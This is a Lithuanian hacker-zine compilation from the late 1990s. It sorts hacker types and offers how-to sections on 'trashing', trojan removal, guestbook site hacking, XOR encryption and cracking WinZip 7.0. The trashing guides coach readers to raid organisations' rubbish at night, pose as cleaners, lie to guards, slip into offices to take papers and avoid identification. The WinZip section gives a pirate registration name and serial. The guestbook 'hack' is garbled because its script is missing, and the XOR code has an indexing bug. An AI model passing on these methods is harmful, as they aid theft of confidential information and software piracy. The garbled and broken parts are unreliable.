Phreakeriai (ish anglishko “Phone freak”-telefoninis manijakas)specializuojasi telikomunikacijoje. Ju aistra – telefonu tinklai. … Galima sakyti, kad pirmi phreakeriai buvo linksmi vaikinai, dirbantyspirmuosiuose telefonu komutatoriuose, kada Bell’o ishradimas ka tik pradejouzhkariauti pasauli. Dabartinius phreakerius pagal sritis galima skirstytii mobilaus ryshio phreakerius (cellular phreakers), anologiniu telefonostocziu specialistus, bei tuos, kurie uzhsiima skaitmeninu telefono ryshiu.Yra dar viena sritis, kur phreakerius galima sieti su carderiais – taitaksofonai, naudojantys plastikines korteles, taczhiau apie korteles –shiek tiek veliau. Kaip phreakeriu veiklos pavyzdzhius galime paminetinemokama naudojimasi telefono ryshio paslaugomis, telefono stochiukontrole (vadinami “boksai” – prietaisai, leidzhiantys emuliuoti telefonostoties signalus ish eilinio abonento telefono linijos), mobilaus ryshiomonitoringa.

3. Carderiai

Carderiai (“card” – kortele): juos domina viskas, kas susije suplastikinemis kortelemis. Siauriau – nusikaltimai kreditiniu korteliupagalba. Shiais laikais plastikines korteles uzhima vis daugiau vietosivairiu paslaugu sferoje. Su jomis siejama vadinama “saugiu pinigu” ideja.Kiek ji saugi rodo vis didejantis nusikaltimu, ivykdytu plastikiniukorteliu pagalba, skaiczius. Taciau reiktu skirti atvejus, kai tokionusikaltimo realizavimui naudojamos aukshtosios technologijos (telefonokorteles “czipo” signalo emuliavimas, t. y. amzhina kortele; kreditiniukorteliu numeriu algoritmo “lauzhymas”; operacijos su bankomatais) nuoelementaraus sukcziavimo, pasitelkiant galiojancziu kreditiniu korteliunumerius, vogtas korteles, etc.

4. Crackeriai

Crackeriai (“crack” – lauzhti): komercines programines irangos“lauzhymas” – apsaugos nuo nelegalaus kopijavimo ir diegimoneutralizavimas. Galima sakyti, kad tai jau shiek tiek pasenusi savoka, nespanashia veikla dabar uzhsiima warezmanai. Crackeriais vadinamiprogramuotojai, atliekantys pati apsaugos nuo programu nuemima, programoskodo analize bei “crack’u” (specialiu programu, neutralizuojancziuapsauginio mechanizmo veikima) rashyma. Crackeriai dazhnai bendradarbiaujasu warezmanais, arba yra ivairiu piratiniu grupiu nariai.

5. Warezmanai

Warezmanai (“warez” – nelegalios programines irangos kopijos):programines irangos piratai. Warezmanai dirba grupemis kuriu vidujeegzistuoja funkciju pasidalijimas. Paprastai tokioje grupeje buna:naujausios programines irangos tiekejai (dazhnai piratinis produktaspasirodo rinkoje ankscziau nei legali programa); kurjeriai, randantys vietaprogramines irangos saugojimui (czia warezmanai dazhnai pasitelkia ipagalba hackerius, kurie nulauzhia koki nors nuobodu serveri, ir paverchiaji piratiniu programu saugykla, naudodamiesi shio serverio resursais, oserverio savininkas nieko net neitaria iki tol, kol milzhinishkaipadidejes trafikas ne atkreipia demesio, kad czia kazhkas netvarkoj);crackeriai, atliekantys apsauginiu programos mechanizmu neutralizavima;dileriai – ish esmes neturintys nieko bendro su kompiuteriais, betatliekantys piratines programines irangos platinima bei tvarkantys visusorganizacinius reikalus.

6. Virus-makeriai

Kaip jau aishku ish pavadinimo, virus-makeriai, tai virusu autoriai.Ju arkliukas – asembleris ir matematine logika. Kas yra kompiuteriu virusasczia neaishkinsim, nezhinantys tegul pasidomi specialioje literaturoje.Technologinio pogrindzhio atstovai vertina virusu autorius dvejopai:vieni mano shi uzhsiemima esa beprasmiu, brutaliu vandalizmu, kiti jaiszhavisi ir juos idealizuoja, ir czia, ko gero, viskas priklauso nuo pozhiurio.Galima zhavetis dirbtinos gyvybes formos kureju, bet veikejo, jaucziancziomalonuma skleidzhiant totaline destrukcija kitaip negu socialiniu psichopatunepavadinsi.

50. Trashing

Negalvokit, kad hakeris viska padaro tik sededamas prie kompiuterio. Vienas is budu gauti informacija apie auka yra TRASHINGAS (nuo anglisko zodzio trash- siuksles). Pasiknisus aukos siukslineja galima gauti daug info apie auka. Pvz.: ivairius manualus, instrukcijas apie ivaire aukos technine iranga. Galima gauti net ir acountu slaptazodziu, nes kai kurie zmones, kad neuzmirstu juos uzsiraso kur nors ir pota gali si uzrasa ismesti. Patarimai busimiems trasherems:

-=Pasiimkit su savim keleta daiktu:=-

1. Maisa siukslem. Jug nepulsi viska skaityt vietoj. Viska reikia parsinesti. O kaip tu kitaip parinesi? Beje geriau isideti keleta maisu, nes gali vienas suplysti arba netilpti siuksles i viena.

2. Zibintuveli (prozektoriu). Geriausiai eiti nakti (kuo maziau zmoniu matys tuo geriau), todel reikia su kazkuo pasisviesti ir prozektorius tam puikiai tinka. Patarimas: isitikink ar tikrai veikia jis korektiskai, ar baterijos nenuses etc, prisitvirtink ji kad butu patogu naudotis.

3. Gumines pirstines. Nors jus knisites po visokius popiergalius, bet vistiek reikia apsidrausti, nes galite uztaikyti ant sekretores maisto likuciu, “Allways” :), etc.

4. Tinkama apranga. Ka daryti jei kas nors prades saukti: ko cia knisies? Tada padeda tinkama apranga: kaip kokio slavejo, siusklininko, alchaso. Jei busite apsirenges kaip alchasas, tai galesite pasiteisinti: renku butelius; pravers keletas bonkiu, kad skambetu itikinamiau.

-=Patarimai:=-

Geriausia pries viska darant gerai viska apgalvoti, suzinoti siuksliu vezimo grafikus (kad netektu knistis po tuscia konteineri). Gal net tektu ieit i ofiso (ar pan) patalpas ir siuksles pasiimti is ten (galima ir ne tik siuksles). Pries eidamas i si zygi patikrink visas kisenes etc: ar nera jokiu nereikalingu daiktu, dokumentu etc (jie gali maisyti zygio metu, gai juos pamesti, arba per juos gali indentifikuoti tave).Grize ir viska apziureje pasalinkite viska. Issimaudykite po dusu, vonioje etc.

51. Trashingas 2

Trashing’as (nuo anglishko “trash” – “shiukshles”), tai vienas ishalternatyviniu budu, kuriais hackeris gauna jam reikiamos informacijos.Kartais tiesiog neitiketina, kiek daug galima suzhinoti apie istaigos arorganizacijos funkcionavima pazhvelgus i jos shiukshliu dezhiu turini.Ten galima rasti telefonu sarashus, skirtus vidaus naudojimui, ivairiusmanualus ir instrukcijas, organizaciju pavadinimus ir asmenu pavardes, infoapie projektu vystyma, failus magnetiniuose diskeliuose ir daug kitokioslabai idomios informacijos. Pvz., neseniai teko pastebeti remonto atliekukruva prie naujo “Snoro” banko ofiso. Tarp ju voliojosi karonines dezhesnuo baldu ir orgtechnikos. Paanalizavus 🙂 shias atliekas, pavyko aptiktibanke naudojamu modemu su Remote Management tech. aprashymus ir insrukcijas,bei keleta manualu nuo aparaturos, skirtos kreditiniu korteliu aptarnavimui.Butu tiesiog neracionalu shia informacija nepasinaudoti. Aishku, galima dabar tiesiog ishkart varyti tushtinti visus pasitaikusius shiukshliu konteinerius. Taciau ash patarciau shiam zhygiui gerai pasiruoshti. Pradekim nuo materialines bazes. Taigi – “Universalus Trasherio Rinkinys:”

Gumines pirshtines: Nors dauguma shiukshliu, kuriose jums teks knistis yra“shvarios” – pagrinde popieriai – vis tiek pravartu jas tureti. Taip patdevekite pirshtines namuose, kai jus rushiuosite savo grobi.

Zhibintuvelis: Pritvirtinkite prie jo virves gabala arba brezentini dirzhelisu kilpa, kuria butu patogu uzhmauti ant rankos. Galingas zhibintuvas labaipravers jums naktinese zhygiuose, ypac konteinerio viduje. Isitikinkite, kadjis veikia, ir kad elementai jusu nepaves.

Maishai shiukshlem: Labiausiai tinka tamsus ir nepermatomi – jus juk nenorite,kad kiti matytu kas juose yra. Patyre zhmones ima ishkart du maishus –vienas kitame, tam atvejui, jei vienas ish ju suplishtu.

Tinkama apranga: Nevertetu tirineti konteinerius su shiukshlem apsivilkusshliubini kostiuma. Tas pats ir del batu. Apsirenkite patogiai, geriausiaisenais drabuzhiais, kuriuos nebutu gaila sugadinti. Jeigu turite kazhkapanashaus i specialiuosius drabuzhius – uzhsidekite juos (labai praverstuoranzhine shlavejo ar shiukshlininko lemene). Jeigu jums yra zhinoma, kadkompanijos aptarnaujantis personalas paprastai devi tam tikros spalvos marshkinius, kepuraites ar shvarkus, pasistenkite apsirengti kuo panashiau.Kitais atvejais rinkites tamses drabuzhiu spalvas.

Tushti buteliai: Taip, taip, nesijuokit 🙂 Kai kurie hackeriai pasako sargamsar kitiems apsauginiams, kad ieshko tushciu buteliu. Reiktu isideti keletaju i savo maisha, kad atrodytumet itikinamiau.

Bendros rekomendacijos: Geriausia uzhsiimt trashingu kai yra nusistovejesausi sauleti orai, kad jusu paieshku objektas butu deramam stovyje. Priesh isheidami ish namu, galite atlikti mazhyti sociologini tyrima, paskambinti i specialiosios paskirties bendroves, uzhsiimancias shiukshliuishvezhimu, suzhinoti ju darbo grafikus. Galbut jums netgi pavyktu lokalizuoti vietas savartyne, kur vezhamos shiukshles ish tam tikru ofisu.Galite taip pat pameginti patekti i ofisu patalpas ir pagrobti 🙂 ishmestuspopierius tiesiai ish ten.Ruoshdamiesi trashingo akcijai, priesh isheinant ish namu, pasitikrinkite kishenes: ar jose nera pashaliniu daiktu ar dokumentu, leidzhianciu jus identifikuoti, o taip pat daiktu, kuriuos galite pamesti.Ir dar vienas neblogas patarimas: grizhe ish medzhiokles, nusiprauskite podushu :)Sekmes.

MG , 1998

52. trOJAN REMOVAL

Jei pasigavai koki trojana, kuris tave labai nervina, nieko baisaus! Trojanai – nera labai baisus, kaip atrodo ish pirmo zhvilgsnio… Jiuos visada galima panaikinti, bet visu pirma ishsiaishkinkime kaip jis pas tave pateko. Shtai keletas patarimu, kad jo daugiau nebutu tavo sistemoje:

1. Niekada mIRC’e, ICQ ar kur nors kitur nepriimk keistu failu su keistais pavadinimais pvz: sexypic.bmp.exe!

2. Priesh paleisdamas kiekviena gauta faila ish nepazhistamo/nepatikimo zhmogaus perskanuok ji su antivirusine!

3. Naudok ugnies sienas (firewall), kurios tave apsaugos nuo piktadariu 🙂

Tai butu keletas tokiu smulkiu patarimu… Kad panaikinti jau i sistema isivelusi trojana, tau teriekia surasti jo prirashyta informacija, bei ja ishtrinti. Shtai ka irasho shie trojanai:

Sub 7 2.1

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Winloader”=”MSREXE.exe” [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “WinLoader”=”MSREXE.exe”

Win.ini [windows] load=MSREXE.exe

System.ini shell=Explorer.exe MSREXE.exe

Deep Throat 3.1

Nusikopijuoja i: c:windowssystray.exe (Nesumaishyk su: c:windowssystemsystray .exe 🙂

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Systemtray”=”c:\windows\systray.exe”

Shadow Phyre

Nusikopijuoja i:c:windowssysteminet.exe c:windowssystemWinZipp.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“WinZipp”=”C:\WINDOWS\SYSTEM\WinZipp.exe /nomsg”[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]“INET Wizard”=”C:\WINDOWS\SYSTEM\inet.exe /nomsg”

Tiny Telnet Server

Nusikopijuoja i: c:windowswindll.exe 127488 Baitu

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“Windll.exe”=”C:\WINDOWS\Windll.exe”

Kuang

Nusikopijuoja i:c:windows_webcache_.exeC:WINDOWSSYSTEMTemp$1.exe

Regedit:[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]“WebAccelerator”=”_webcache_.exe”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“Temp$1.task”=”C:\WINDOWS\SYSTEM\Temp$1.exe”

Netsphere

Nusikopijuoja i:C:WINDOWSsystemnssx.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “NSSX”=”C:\WINDOWS\system\nssx.exe”

FakeVirii

Nusikopijuoja i:C:WINDOWSsystemnssx.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “Kernel32.dll”=”c:\windows\ccc.exe”Satans Back Door

Nusikopijuoja i:C:windowssysprot.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “sysprot “protection”=”C:\windows\sysprot.exe”

Indoctrination

Nusikopijuoja i:C:windowssysprot.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce]“Msgsrv16″=”Msgsrv16”HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce]“Msgsrv16″=”Msgsrv16”[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“Msgsrv16″=”Msgsrv16”[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]“Msgsrv16″=”Msgsrv16”[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]“Msgsrv16″=”Msgsrv16”

JammerKillah12

Nusikopijuoja i:C:windowsMsWin32.drv

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]“MsWindrv”=”MsWin32.drv”

AolTrojan

Nusikopijuoja i :C:windowsDAT92003.exe arbaC:windowsDAT92003.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“dat92003″=”C:\WINDOWS\SYSTEM\DAT92003.exe”

Hack’a’tack

Nusikopijuoja i:C:windowsExpl32.exe

Regedit:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“Explorer32″=”C:\WINDOWS\Expl32.exe”

The Unexplained

Nusikopijuoja i:C:windowsINETB00ST.EXE

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “InetB00st”=”C:\WINDOWS\TEMP\INETB00ST.EXE”

Progenic Trojan Beta Series

Nusikopijuoja i:c:windowsscandiskvr.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“Scandisk”=”c:\windows\scandiskvr.exe”

Hack’a’ttack1.12

Nusikopijuoja i:C:WINDOWSExpl32.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“Explorer32″=”C:\WINDOWS\Expl32.exe”

BackConstruction 1.2

Nusikopijuoja i:C:WINDOWSCmctl32.exe

Regedit:[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]“Shell”=”C:\WINDOWS\Cmctl32.exe”

Netsphere Final

Nusikopijuoja i: c:windowssystemepp32.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “ExecPowerProfile”=”C:\WINDOWS\system\epp32.exe”

Vampire

Nusikopijuoja i: c:windowssystemSockets.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Sockets”=”c:windowssystemSockets.exe”

Maverick’s Matrix

Nusikopijuoja i: C:WINDOWSWincfg.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Wincfg.exe”=”C:WINDOWSWincfg.exe”

Total Eclypse

Nusikopijuoja i: C:WindowsSystemRmaapp.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Rnaapp”=”C:\Windows\System\Rmaapp.exe”

Vampire 1.2

Nusikopijuoja i: c:windowssystemWinboot.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “WindowsBootFile”=”c:\windows\system\Winboot.exe”

Incommand

Nusikopijuoja i: Path_Where_RunFilename.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “AdvancedSettings”=”Path_Where_RunFilename.exe”

Transscout 1.1 +1.2

Nusikopijuoja i: c:windowskernel16.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “kernel16″=”C:\WINDOWS\kernel16.exe”

Ambush

Nusikopijuoja i: c:windowsZcn32.exe

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]“ZKA”=”Zcn32.exe”

DerSpaeher3

Nusikopijuoja i: C:WINDOWSSystemdkbdll.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Explore”=”C:WINDOWSSystem\dkbdll.exe Hi”

Subseven 2.x

Nusikopijuoja i: C:WINDOWSMSREXE.exe

Regedit:[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Winloader”=”MSREXE.exe”[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “WinLoader”=”MSREXE.exe”Win.ini:

Win.ini:[windows] load=MSREXE.exe

System.ini:shell=Explorer.exe MSREXE.exe

Y3k

Nusikopijuoja i: C:WINDOWSSYSTEMRundII.EXE

Regedit:[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]“Explorer32″=”C:\WINDOWS\RundII.exe”

Remote hack 1.1 & 1.2

Nusikopijuoja i: C:WINDOWSSYSTEMRundII.EXE

Regedit:[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]“Norton Anti Virus”=”C:\WINDOWS\norton.exe”

BioNet (Ver: 0-8-4; 0.8.71; 2.2.1; 2.6.1)

Nusikopijuoja i: C:WINDOWSSYSTEMlibupdate.exe

Regedit:[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]“WinLibUpdate”=”C:\WINDOWS\libupdate.exe -hide”

SheepGoat

Nusikopijuoja i: C:WINDOWSSYSTEMSG.scr

Win.ini:run=C:WINDOWSSYSTEMSG.scr

CrazyNet

Nusikopijuoja i: C:WINDOWSRegistry32.exe

Regedit:[HKCUUSoftwareMicrosoftWindowsCurrentVersionRun]“Reg32″=”Registry32.exe”

Win.ini:run=Registry32.exe

System.ini:shell=Explorer.exe Registry32.exe

Taigi, jums tereikia vis tai pratrinti ir problemos kaip nebuta! Sekmes! NUKE

53. Web crack

Kaip nuhakinti saita Puslapio nuhakinimo yra daug budu.Viena ash ish ju chia paminesiu.Tai vienuzhodzhiu yra hackinimas per guestbook,a. Jums tereikia surasti saita kuriame bootu guestbook’as,ir toje vietoje kur turetumete parashyti kaip patiko saitas,parashykite scripta, tai yra: Ir viskas. Happy Hacking. Skeletaz

54. XOR- sifravimo metodas

Vienas is paprasciausiu sifravimu yra XOR metodas. Jis pagrystas logine funkcija XOR. XOR reiksmiu lentele:

argumentai reiksme 1 1 0 1 0 1 0 1 1 0 0 0

Sifravimas algoritmas toks:1. Imamas tokio ilgio tekstas/duomenys [kuriuos norme uzsifruoti], koks yra slaptazodzio ilgis. 2. Kiekvienas, atitinkamas teksto/duomenu baitas ir slaptazodzio baitas pateikami kaip XOR argumentai. 3. Gautas baitas ir yra tas uzsifruotas baitas. 4. Imama sekantys slaptazodzio ilgio baitai ir (kol tekstas/duomenys nesibaige) vykdoma punktas nr. 2.

Issifravimas analogiskas sifravimui:Imamas uzsifruotas tekstas/duomenys ir jie dar karta sifruojami pagal auksciau pateikta algoritma. Gaunamas nesifruotas tekstas.

Sio metodo trukumai yra tie, jog jei sifrojamas normalus tekstas ir slaptazodis nelabai ilgas, tai gan lengvai galima pralausti si algoritma brute force`u.

Jei kas susizavejo siuo algoritmu, tai parasiau trumpa programele, kuri demonstruoja sifravima/desifravima duomenis.

uses crt;var unsifred, {nesifruota fraze} sifred, {sifruota fraze} desifred, {issifruota fraze} key: string; {sifravimoraktas} i, {pagalbinis kintamasis} ki : byte; {rakto ilgi nusakantis dydis}begin

ClrScr; {valom ekrana}

WriteLn ( ‘Ivesk fraze kuria sifruosi:’ ); ReadLn ( unsifred ); {Ivedam sifruojama fraze}

WriteLn ( ‘Ivesk rakta pagal kuri sifruosi:’ ); ReadLn ( key ); {Ivedam sifravimo rakta}

ki := Length ( key ); {Randam rakto ilgi} sifred := unsifred; {Padarom eilutes, kuriu ilgiai} desifred := unsifred; {butu lygus frazes ilgiui}

for i := 1 to Length ( unsifred ) do {Sifruojame} sifred [ i ] := Chr ( ord ( unsifred [ i ] ) xor Ord ( key [ i mod ki ] ) );

WriteLn (sifred); {Sausdiname uzsifruota fraze}

for i := 1 to Length ( unsifred ) do {Desifruojame/atsifruojame} desifred [ i ] := Chr ( ord ( sifred [ i ] ) xor Ord ( key [ i mod ki ] ) );

WriteLn (desifred); {Sausdiname atsifruota fraze}

ReadLn; {Laukiame [ENTER] paspaudimo}

55. Kaip nucrackin’ti WinZip 7.0

Nukrakinti WinZip very zaprasta.Paleisk WinZip.PairinkOrder ir, jai nebijai necenzuriniu zhodzhiu i User namelaukeli ivesk:eik nxO i password:111111bf

Shtai ir viskas

Happy cracking.Skeletaz